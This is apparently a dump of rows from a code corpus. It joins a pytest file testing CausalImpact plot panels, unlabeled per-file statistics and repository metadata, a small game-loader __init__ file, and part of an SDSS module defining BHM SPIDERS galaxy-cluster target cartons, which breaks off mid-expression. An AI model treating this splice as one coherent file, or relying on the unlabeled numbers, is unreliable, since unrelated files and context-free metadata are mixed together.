plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Cumulative Effect'}
date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_cumulative_panel_date_index_no_freq(date_rand_data, pre_str_period,
post_str_period, monkeypatch):
ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
dd = date_rand_data.copy()
dd.drop(dd.index[10:20])
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['cumulative'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Cumulative Effect'}
date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
date_ = date_ + timedelta(days=-1)
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_multi_panels(rand_data, pre_int_period, post_int_period, monkeypatch):
ci = CausalImpact(rand_data, pre_int_period, post_int_period)
ax_mock = mock.Mock()
ax_mock.get_xticklabels.return_value = 'xticklabels'
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['original', 'pointwise'], figsize=(10, 10))
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(10, 10))
plotter_mock.subplot.assert_any_call(2, 1, 1)
plotter_mock.subplot.assert_any_call(2, 1, 2, sharex=ax_mock)
plotter_mock.setp.assert_called_once_with('xticklabels', visible=False)
assert ax_mock.plot.call_count == 3
plotter_mock.show.assert_called_once()
ax_mock.reset_mock()
plot_mock.reset_mock()
plot_mock.reset_mock()
ci.plot(panels=['original', 'cumulative'], figsize=(10, 10))
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(10, 10))
plotter_mock.subplot.assert_any_call(2, 1, 1)
plotter_mock.subplot.assert_any_call(2, 1, 2, sharex=ax_mock)
plotter_mock.setp.assert_called_once_with('xticklabels', visible=False)
assert ax_mock.plot.call_count == 3
plotter_mock.show.assert_called_once()
ax_mock.reset_mock()
plot_mock.reset_mock()
plot_mock.reset_mock()
ci.plot(panels=['pointwise', 'cumulative'], figsize=(10, 10))
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(10, 10))
plotter_mock.subplot.assert_any_call(2, 1, 1, sharex=ax_mock)
plotter_mock.subplot.assert_any_call(2, 1, 2, sharex=ax_mock)
plotter_mock.setp.assert_called_once_with('xticklabels', visible=False)
assert ax_mock.plot.call_count == 2
plotter_mock.show.assert_called_once()
ax_mock.reset_mock()
plot_mock.reset_mock()
plot_mock.reset_mock()
ci.plot(panels=['pointwise', 'cumulative', 'original'], figsize=(10, 10))
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(10, 10))
plotter_mock.subplot.assert_any_call(3, 1, 1)
plotter_mock.subplot.assert_any_call(3, 1, 2, sharex=ax_mock)
plotter_mock.subplot.assert_any_call(3, 1, 3, sharex=ax_mock)
plotter_mock.setp.assert_called_with('xticklabels', visible=False)
assert ax_mock.plot.call_count == 4
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_raises_when_not_initialized(rand_data, pre_int_period, post_int_period,
monkeypatch):
ci = CausalImpact(rand_data, pre_int_period, post_int_period)
ci.summary_data = None
plotter_mock = mock.Mock()
plot_mock = mock.Mock(return_value=plotter_mock)
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
with pytest.raises(RuntimeError):
ci.plot()
def test_plot_raises_wrong_input_panel(rand_data, pre_int_period, post_int_period,
monkeypatch):
ci = CausalImpact(rand_data, pre_int_period, post_int_period)
plotter_mock = mock.Mock()
plot_mock = mock.Mock(return_value=plotter_mock)
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
with pytest.raises(ValueError) as excinfo:
ci.plot(panels=['test'])
assert str(excinfo.value) == (
'"test" is not a valid panel. Valid panels are: '
'"original", "pointwise", "cumulative".'
)
def test_plot_with_no_llb(rand_data, pre_int_period, post_int_period, monkeypatch):
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci = CausalImpact(rand_data, pre_int_period, post_int_period)
ci.trained_model.filter_results.loglikelihood_burn = 0
ci.plot()
fig_mock.text.assert_not_called()
| 39.482565
| 90
| 0.696068
| 5,078
| 35,100
| 4.474793
| 0.042733
| 0.039607
| 0.024645
| 0.041808
| 0.951415
| 0.950227
| 0.950227
| 0.948334
| 0.944946
| 0.940589
| 0
| 0.021278
| 0.169858
| 35,100
| 888
| 91
| 39.527027
| 0.758563
| 0.018632
| 0
| 0.903597
| 0
| 0
| 0.11622
| 0.006391
| 0
| 0
| 0
| 0
| 0.407194
| 1
| 0.027338
| false
| 0
| 0.01295
| 0
| 0.040288
| 0.001439
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2c9b5f152c75499a6c9989284b92842797c5070
| 192
|
py
|
Python
|
src/game/loaders/__init__.py
|
ShoaibSyed1/project-pokemon
|
6916962cf0be478c2a229b6620e9425d707c2b29
|
[
"MIT"
] | null | null | null |
src/game/loaders/__init__.py
|
ShoaibSyed1/project-pokemon
|
6916962cf0be478c2a229b6620e9425d707c2b29
|
[
"MIT"
] | null | null | null |
src/game/loaders/__init__.py
|
ShoaibSyed1/project-pokemon
|
6916962cf0be478c2a229b6620e9425d707c2b29
|
[
"MIT"
] | null | null | null |
from game.loaders.entity import EntityLoader
from game.loaders.scene import SceneLoader
from game.loaders.sprite import *
from game.loaders.text import TextLoader
from game.loaders.ui import *
| 38.4
| 44
| 0.838542
| 28
| 192
| 5.75
| 0.428571
| 0.248447
| 0.465839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098958
| 192
| 5
| 45
| 38.4
| 0.930636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d2dcfc198dba335c0fc699f56ee294c26e09e4ff
| 47,952
|
py
|
Python
|
python/target_selection/cartons/bhm_spiders_clusters.py
|
sdss/target_selection
|
7196bf1491c4e9c18140301c7001e503f391a8e1
|
[
"BSD-3-Clause"
] | 3
|
2020-07-07T01:38:59.000Z
|
2020-11-24T21:46:58.000Z
|
python/target_selection/cartons/bhm_spiders_clusters.py
|
sdss/target_selection
|
7196bf1491c4e9c18140301c7001e503f391a8e1
|
[
"BSD-3-Clause"
] | 26
|
2020-05-28T07:18:54.000Z
|
2021-11-30T18:36:10.000Z
|
python/target_selection/cartons/bhm_spiders_clusters.py
|
sdss/target_selection
|
7196bf1491c4e9c18140301c7001e503f391a8e1
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: Tom Dwelly
# @Date: 2020-06-17
# @Filename: bhm_spiders_clusters.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
# isort: skip_file
import peewee
from peewee import JOIN
from peewee import fn
from target_selection.cartons.base import BaseCarton
from target_selection.mag_flux import AB2nMgy, AB2Jy
# general catalogdb imports
from sdssdb.peewee.sdss5db.catalogdb import (
Catalog,
EROSITASupersetClusters,
)
# imports of existing spectro catalogues
from sdssdb.peewee.sdss5db.catalogdb import (
CatalogToSDSS_DR16_SpecObj,
SDSS_DR16_SpecObj,
CatalogToBHM_eFEDS_Veto,
BHM_eFEDS_Veto,
SDSSV_BOSS_SPALL,
SDSSV_BOSS_Conflist,
SDSSV_Plateholes,
SDSSV_Plateholes_Meta,
)
# additional imports required by bhm_spiders_clusters_lsdr8
from sdssdb.peewee.sdss5db.catalogdb import (
CatalogToLegacy_Survey_DR8,
Legacy_Survey_DR8,
)
# additional imports required by bhm_spiders_clusters_ps1dr2
from sdssdb.peewee.sdss5db.catalogdb import (
Panstarrs1,
CatalogToPanstarrs1, # only exists after v0.5 cross-match
)
# Details: Start here
# https://wiki.sdss.org/display/OPS/Defining+target+selection+and+cadence+algorithms
# ############################################
# ############################################
# ############################################
# ############################################
# # This file provides the following BHM cartons in v0.5:
#
# bhm_spiders_clusters_efeds_stragglers
# bhm_spiders_clusters_lsdr8
# bhm_spiders_clusters_ps1dr2
#
# ############################################
# ############################################
# ############################################
# ############################################
# Notes on how many targets to expect:
# => SELECT ero_version,xmatch_method,xmatch_version,opt_cat,count(*)
# FROM erosita_superset_clusters GROUP BY ero_version,xmatch_method,xmatch_version,opt_cat;
# ero_version | xmatch_method | xmatch_version | opt_cat | count
# --------------------------+--------------------+--------------------------+--------------+--------
# eFEDS_c001_V18C_legacy_d | EROMAPPER_LS_DR8 | grzw1_v0.3_2020-12-04 | lsdr8 | 73768
# em01_c946_201008_poscorr | EROMAPPER_LS_DR8 | grzw1_v0.3_2020-12-04 | lsdr8 | 160465
# em01_c946_201008_poscorr | EROMAPPER_PS1_DR2 | eromapper_2020-10-23 | ps1dr2 | 140808
#
#
# END PREAMBLE
# ##################################################################################
class BhmSpidersClustersLsdr8Carton(BaseCarton):
name = 'bhm_spiders_clusters_lsdr8'
category = 'science'
mapper = 'BHM'
program = 'bhm_spiders'
tile = False
instrument = 'BOSS'
inertial = True
def build_query(self, version_id, query_region=None):
c = Catalog.alias()
ls = Legacy_Survey_DR8.alias()
c2ls = CatalogToLegacy_Survey_DR8.alias()
s2020 = BHM_eFEDS_Veto.alias()
sV = SDSSV_BOSS_SPALL.alias()
xx = EROSITASupersetClusters.alias()
x = (
xx
.select(
fn.rank().over(partition_by=[xx.ero_detuid],
order_by=[xx.xmatch_metric.desc()]).alias('x_rank'),
xx.ero_detuid.alias('ero_detuid'),
xx.ls_id.alias('ls_id'),
xx.target_has_spec.alias('target_has_spec'),
)
.where(
(xx.ero_version == self.parameters['ero_version']),
(xx.xmatch_method == self.parameters['xmatch_method']),
(xx.xmatch_version == self.parameters['xmatch_version']),
(xx.opt_cat == self.parameters['opt_cat']),
(xx.xmatch_metric > self.parameters['xmatch_metric_min']),
(xx.ero_det_like > self.parameters['det_like_min']),
)
.alias('x')
)
instrument = peewee.Value(self.instrument)
inertial = peewee.Value(self.inertial).cast('bool')
fibertotflux_r_max = AB2nMgy(self.parameters['fibertotmag_r_min'])
fibertotflux_r_min = AB2nMgy(self.parameters['fibertotmag_r_max'])
fibertotflux_z_max = AB2nMgy(self.parameters['fibertotmag_z_min'])
fibertotflux_z_min = AB2nMgy(self.parameters['fibertotmag_z_max'])
fibertotflux_r_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence1'])
fibertotflux_z_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_z_for_cadence1'])
fibertotflux_r_min_for_cadence2 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence2'])
gaia_g_max_for_cadence1 = self.parameters['gaia_g_max_for_cadence1']
gaia_rp_max_for_cadence1 = self.parameters['gaia_rp_max_for_cadence1']
# flux30 = AB2nMgy(30.00)
# match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
# #########################################################################
# prepare the spectroscopy catalogues
match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
spec_sn_thresh = self.parameters['spec_sn_thresh']
spec_z_err_thresh = self.parameters['spec_z_err_thresh']
# SDSS DR16
c2s16 = CatalogToSDSS_DR16_SpecObj.alias()
ss16 = SDSS_DR16_SpecObj.alias()
s16 = (
ss16.select(
ss16.specobjid.alias('specobjid'),
)
.where(
ss16.snmedian >= spec_sn_thresh,
ss16.zwarning == 0,
ss16.zerr <= spec_z_err_thresh,
ss16.zerr > 0.0,
ss16.scienceprimary > 0,
)
.alias('s16')
)
# SDSS-IV/eFEDS March2020
c2s2020 = CatalogToBHM_eFEDS_Veto.alias()
ss2020 = BHM_eFEDS_Veto.alias()
s2020 = (
ss2020.select(
ss2020.pk.alias('pk'),
)
.where(
ss2020.sn_median_all >= spec_sn_thresh,
ss2020.zwarning == 0,
ss2020.z_err <= spec_z_err_thresh,
ss2020.z_err > 0.0,
)
.alias('s2020')
)
# SDSS-V spAll
ssV = SDSSV_BOSS_SPALL.alias()
sV = (
ssV.select(
ssV.specobjid.alias('specobjid'),
ssV.plug_ra.alias('plug_ra'),
ssV.plug_dec.alias('plug_dec'),
)
.where(
ssV.sn_median_all >= spec_sn_thresh,
ssV.zwarning == 0,
ssV.z_err <= spec_z_err_thresh,
ssV.z_err > 0.0,
ssV.specprimary > 0,
)
.alias('sV')
)
# SDSS-V plateholes - only consider plateholes that
# were drilled+shipped but that were not yet observed
ssph = SDSSV_Plateholes.alias()
ssphm = SDSSV_Plateholes_Meta.alias()
ssconf = SDSSV_BOSS_Conflist.alias()
sph = (
ssph.select(
ssph.pkey.alias('pkey'),
ssph.target_ra.alias('target_ra'),
ssph.target_dec.alias('target_dec'),
)
.join(
ssphm,
on=(ssph.yanny_uid == ssphm.yanny_uid)
)
.join(
ssconf, JOIN.LEFT_OUTER,
on=(ssphm.plateid == ssconf.plate)
)
.where(
(ssph.holetype == 'BOSS_SHARED'),
(ssph.sourcetype == 'SCI') | (ssph.sourcetype == 'STA'),
ssphm.isvalid > 0,
ssconf.plate.is_null(),
)
.alias('sph')
)
# priority is determined by target rank within cluster
# start with a priority floor value (per carton)
# then increment if any conditions are met:
priority = peewee.Case(
None,
(
(
x.c.x_rank == 1,
self.parameters['priority_floor_bcg']
),
(
x.c.x_rank > 1,
self.parameters['priority_floor_member'] +
fn.least(self.parameters['priority_levels'] - 2,
x.c.x_rank - 2)
),
),
None)
value = peewee.Case(
None,
(
(x.c.x_rank == 1, self.parameters['value_bcg']),
(x.c.x_rank > 1, self.parameters['value_member']),
),
None).cast('float')
# choose cadence based on fiber magnitude in r-band
cadence1 = self.parameters['cadence1']
cadence2 = self.parameters['cadence2']
cadence3 = self.parameters['cadence3']
cadence4 = 'unknown_cadence' # catch failures
cadence = peewee.Case(
None,
(
(
((ls.fibertotflux_r > fibertotflux_r_min_for_cadence1) |
(ls.fibertotflux_z > fibertotflux_z_min_for_cadence1) |
(ls.gaia_phot_g_mean_mag.between(0.1, gaia_g_max_for_cadence1)) |
(ls.gaia_phot_rp_mean_mag.between(0.1, gaia_rp_max_for_cadence1))),
cadence1),
(ls.fibertotflux_r > fibertotflux_r_min_for_cadence2, cadence2),
(ls.fibertotflux_r <= fibertotflux_r_min_for_cadence2, cadence3),
),
cadence4)
# compute transformed SDSS mags for pointlike and extended sources uniformly
# transform the legacysurvey grz into sdss psfmag griz
# extract coeffs from fit logs via:
# awk 'BEGIN {print("coeffs = {")} /POLYFIT/{ if($3~/sdss_psfmag/){pe="p"} else if ($3~/sdss_fiber2mag/){pe="e"} else{pe="error"}; printf("\"%s%d_%s\": %s,\n", substr($3,length($3)), $8, pe, $10)} END {print("}")}' bhm_spiders_clusters_lsdr8/lsdr8_fibermag_to_sdss_fiber2mag_?_results.log # noqa
coeffs = {
"g2_e": -0.897719,
"g1_e": 2.298300,
"g0_e": -1.019299,
"i2_e": -0.950114,
"i1_e": 0.981972,
"i0_e": -0.261645,
"r2_e": -0.201741,
"r1_e": 0.697128,
"r0_e": -0.120926,
"z2_e": -1.424312,
"z1_e": 2.415301,
"z0_e": -0.677163,
}
nMgy_min = 1e-3 # equiv to AB=30
# extended - start from ls8 fiberfluxes
g0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g)))
r0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
z0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))
g_r_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g) /
peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
r_z_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r) /
peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))
g_e = (g0_e + coeffs['g0_e'] + coeffs['g1_e'] * g_r_e + coeffs['g2_e'] * g_r_e * g_r_e)
r_e = (r0_e + coeffs['r0_e'] + coeffs['r1_e'] * g_r_e + coeffs['r2_e'] * g_r_e * g_r_e)
i_e = (r0_e + coeffs['i0_e'] + coeffs['i1_e'] * r_z_e + coeffs['i2_e'] * r_z_e * r_z_e)
z_e = (z0_e + coeffs['z0_e'] + coeffs['z1_e'] * r_z_e + coeffs['z2_e'] * r_z_e * r_z_e)
# validity checks
valid = (g0_e.between(0.1, 29.9) &
r0_e.between(0.1, 29.9) &
z0_e.between(0.1, 29.9))
opt_prov = peewee.Case(None, ((valid, 'sdss_fiber2mag_from_lsdr8'),), 'undefined')
magnitude_g = peewee.Case(None, ((valid, g_e),), 'NaN')
magnitude_r = peewee.Case(None, ((valid, r_e),), 'NaN')
magnitude_i = peewee.Case(None, ((valid, i_e),), 'NaN')
magnitude_z = peewee.Case(None, ((valid, z_e),), 'NaN')
magnitude_gaia_g = peewee.Case(
None,
((ls.gaia_phot_g_mean_mag.between(0.1, 29.9), ls.gaia_phot_g_mean_mag),),
'NaN')
magnitude_gaia_bp = peewee.Case(
None,
((ls.gaia_phot_bp_mean_mag.between(0.1, 29.9), ls.gaia_phot_bp_mean_mag),),
'NaN')
magnitude_gaia_rp = peewee.Case(
None,
((ls.gaia_phot_rp_mean_mag.between(0.1, 29.9), ls.gaia_phot_rp_mean_mag),),
'NaN')
# # We want to switch between psfmags and fibertotmags depending on
# # ls.type parameter (PSF or extended)
# # For 'PSF' targets, we use psfmags, but for extended sources use fiber2mags
# opt_prov = peewee.Case(
# ls.type,
# (('PSF', 'ls_psfmag'),),
# 'ls_fibertotmag')
#
# magnitude_g = peewee.Case(
# ls.type,
# (('PSF', (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.flux_g))).cast('float')),),
# (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.fibertotflux_g))).cast('float'))
#
# magnitude_r = peewee.Case(
# ls.type,
# (('PSF', (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.flux_r))).cast('float')),),
# (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.fibertotflux_r))).cast('float'))
#
# magnitude_z = peewee.Case(
# ls.type,
# (('PSF', (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.flux_z))).cast('float')),),
# (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.fibertotflux_z))).cast('float'))
#
# magnitude_i = peewee.Case(
# ls.type,
# (('PSF',
# (22.5 - 2.5 * fn.log10(
# fn.greatest(flux30, 0.5 * (ls.flux_r + ls.flux_z)))).cast('float')),),
# (22.5 - 2.5 * fn.log10(
# fn.greatest(flux30, 0.5 * (ls.fibertotflux_r +
# ls.fibertotflux_z)))).cast('float'))
spec_sn_thresh = self.parameters['spec_sn_thresh']
spec_z_err_thresh = self.parameters['spec_z_err_thresh']
query = (
c.select(
c.catalogid.alias('catalogid'),
ls.ls_id.alias('ls_id'), # extra
x.c.ero_detuid.cast('text').alias('ero_detuid'), # extra
c.ra.alias('ra'), # extra
c.dec.alias('dec'), # extra
priority.alias('priority'),
value.alias('value'),
cadence.alias('cadence'),
instrument.alias('instrument'),
opt_prov.alias('optical_prov'),
magnitude_g.alias('g'),
magnitude_r.alias('r'),
magnitude_i.alias('i'),
magnitude_z.alias('z'),
magnitude_gaia_g.alias('gaia_g'),
magnitude_gaia_bp.alias('bp'),
magnitude_gaia_rp.alias('rp'),
inertial.alias('inertial'),
g0_e.alias('ls8_fibermag_g'), # extra
r0_e.alias('ls8_fibermag_r'), # extra
z0_e.alias('ls8_fibermag_z'), # extra
)
.join(c2ls)
.join(ls)
.join(x, on=(ls.ls_id == x.c.ls_id))
# start joining the spectroscopy
.switch(c)
.join(c2s16, JOIN.LEFT_OUTER)
.join(
s16, JOIN.LEFT_OUTER,
on=(
(c2s16.target_id == s16.c.specobjid) &
(c2s16.version_id == version_id)
)
)
.switch(c)
.join(c2s2020, JOIN.LEFT_OUTER)
.join(
s2020, JOIN.LEFT_OUTER,
on=(
(c2s2020.target_id == s2020.c.pk) &
(c2s2020.version_id == version_id)
)
)
.join(
sV, JOIN.LEFT_OUTER,
on=(
fn.q3c_join(sV.c.plug_ra, sV.c.plug_dec,
c.ra, c.dec,
match_radius_spectro)
)
)
.join(
sph, JOIN.LEFT_OUTER,
on=(
fn.q3c_join(sph.c.target_ra, sph.c.target_dec,
c.ra, c.dec,
match_radius_spectro)
)
)
# finished joining the spectroscopy
.where(
c.version_id == version_id,
c2ls.version_id == version_id,
c2ls.best >> True
)
.where(
s16.c.specobjid.is_null(True), # all of these must be satisfied
s2020.c.pk.is_null(True),
sV.c.specobjid.is_null(True),
sph.c.pkey.is_null(True),
)
.where(
(
(ls.fibertotflux_r.between(fibertotflux_r_min, fibertotflux_r_max)) |
(ls.fibertotflux_z.between(fibertotflux_z_min, fibertotflux_z_max))
),
(x.c.target_has_spec == 0),
# gaia safety checks to avoid bad ls photometry
~(ls.gaia_phot_g_mean_mag.between(0.1, self.parameters['gaia_g_mag_limit'])),
~(ls.gaia_phot_rp_mean_mag.between(0.1, self.parameters['gaia_rp_mag_limit'])),
)
)
if query_region:
query = query.where(peewee.fn.q3c_radial_query(c.ra, c.dec,
query_region[0],
query_region[1],
query_region[2]))
return query
#
# END BhmSpidersClustersLsdr8Carton
# ##################################################################################
class BhmSpidersClustersEfedsStragglersCarton(BaseCarton):
name = 'bhm_spiders_clusters_efeds_stragglers'
category = 'science'
mapper = 'BHM'
program = 'bhm_spiders'
tile = False
instrument = 'BOSS'
inertial = True
def build_query(self, version_id, query_region=None):
c = Catalog.alias()
ls = Legacy_Survey_DR8.alias()
c2ls = CatalogToLegacy_Survey_DR8.alias()
# s2020 = BHM_eFEDS_Veto.alias()
# sV = SDSSV_BOSS_SPALL.alias()
# ph = SDSSV_Plateholes.alias()
# phm = SDSSV_Plateholes_Meta.alias()
xx = EROSITASupersetClusters.alias()
x = (
xx
.select(
fn.rank().over(partition_by=[xx.ero_detuid],
order_by=[xx.xmatch_metric.desc()]).alias('x_rank'),
xx.ero_detuid.alias('ero_detuid'),
xx.ls_id.alias('ls_id'),
xx.target_has_spec.alias('target_has_spec'),
)
.where(
(xx.ero_version == self.parameters['ero_version']),
(xx.xmatch_method == self.parameters['xmatch_method']),
(xx.xmatch_version == self.parameters['xmatch_version']),
(xx.opt_cat == self.parameters['opt_cat']),
(xx.xmatch_metric > self.parameters['xmatch_metric_min']),
(xx.ero_det_like > self.parameters['det_like_min']),
)
.alias('x')
)
instrument = peewee.Value(self.instrument)
inertial = peewee.Value(self.inertial).cast('bool')
fibertotflux_r_max = AB2nMgy(self.parameters['fibertotmag_r_min'])
fibertotflux_r_min = AB2nMgy(self.parameters['fibertotmag_r_max'])
fibertotflux_z_max = AB2nMgy(self.parameters['fibertotmag_z_min'])
fibertotflux_z_min = AB2nMgy(self.parameters['fibertotmag_z_max'])
fibertotflux_r_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence1'])
fibertotflux_z_min_for_cadence1 = AB2nMgy(self.parameters['fibertotmag_z_for_cadence1'])
fibertotflux_r_min_for_cadence2 = AB2nMgy(self.parameters['fibertotmag_r_for_cadence2'])
gaia_g_max_for_cadence1 = self.parameters['gaia_g_max_for_cadence1']
gaia_rp_max_for_cadence1 = self.parameters['gaia_rp_max_for_cadence1']
# flux30 = AB2nMgy(30.00)
# #########################################################################
# prepare the spectroscopy catalogues
match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
spec_sn_thresh = self.parameters['spec_sn_thresh']
spec_z_err_thresh = self.parameters['spec_z_err_thresh']
# SDSS DR16
c2s16 = CatalogToSDSS_DR16_SpecObj.alias()
ss16 = SDSS_DR16_SpecObj.alias()
s16 = (
ss16.select(
ss16.specobjid.alias('specobjid'),
)
.where(
ss16.snmedian >= spec_sn_thresh,
ss16.zwarning == 0,
ss16.zerr <= spec_z_err_thresh,
ss16.zerr > 0.0,
ss16.scienceprimary > 0,
)
.alias('s16')
)
# SDSS-IV/eFEDS March2020
c2s2020 = CatalogToBHM_eFEDS_Veto.alias()
ss2020 = BHM_eFEDS_Veto.alias()
s2020 = (
ss2020.select(
ss2020.pk.alias('pk'),
)
.where(
ss2020.sn_median_all >= spec_sn_thresh,
ss2020.zwarning == 0,
ss2020.z_err <= spec_z_err_thresh,
ss2020.z_err > 0.0,
)
.alias('s2020')
)
# SDSS-V spAll
ssV = SDSSV_BOSS_SPALL.alias()
sV = (
ssV.select(
ssV.specobjid.alias('specobjid'),
ssV.plug_ra.alias('plug_ra'),
ssV.plug_dec.alias('plug_dec'),
)
.where(
ssV.sn_median_all >= spec_sn_thresh,
ssV.zwarning == 0,
ssV.z_err <= spec_z_err_thresh,
ssV.z_err > 0.0,
ssV.specprimary > 0,
)
.alias('sV')
)
# All eFEDS plates have been observed so ignore plateholes now
# # SDSS-V plateholes - only consider plateholes that
# # were drilled+shipped but that were not yet observed
# ssph = SDSSV_Plateholes.alias()
# ssphm = SDSSV_Plateholes_Meta.alias()
# ssconf = SDSSV_BOSS_Conflist.alias()
# sph = (
# ssph.select(
# ssph.pkey.alias('pkey'),
# ssph.target_ra.alias('target_ra'),
# ssph.target_dec.alias('target_dec'),
# )
# .join(
# ssphm,
# on=(ssph.yanny_uid == ssphm.yanny_uid)
# )
# .join(
# ssconf, JOIN.LEFT_OUTER,
# on=(ssphm.plateid == ssconf.plate)
# )
# .where(
# (ssph.holetype == 'BOSS_SHARED'),
# (ssph.sourcetype == 'SCI') | (ssph.sourcetype == 'STA'),
# ssphm.isvalid > 0,
# ssconf.plate.is_null(),
# )
# .alias('sph')
# )
# priority is determined by target rank within cluster
# start with a priority floor value (per carton)
# then increment if any conditions are met:
priority = peewee.Case(
None,
(
(
x.c.x_rank == 1,
self.parameters['priority_floor_bcg']
),
(
x.c.x_rank > 1,
self.parameters['priority_floor_member'] +
fn.least(self.parameters['priority_levels'] - 2,
x.c.x_rank - 2)
),
),
None)
value = peewee.Case(
None,
(
(x.c.x_rank == 1, self.parameters['value_bcg']),
(x.c.x_rank > 1, self.parameters['value_member']),
),
None).cast('float')
# choose cadence based on fiber magnitude in r-band
cadence1 = self.parameters['cadence1']
cadence2 = self.parameters['cadence2']
cadence3 = self.parameters['cadence3']
cadence4 = 'unknown_cadence' # catch failures
cadence = peewee.Case(
None,
(
(
((ls.fibertotflux_r > fibertotflux_r_min_for_cadence1) |
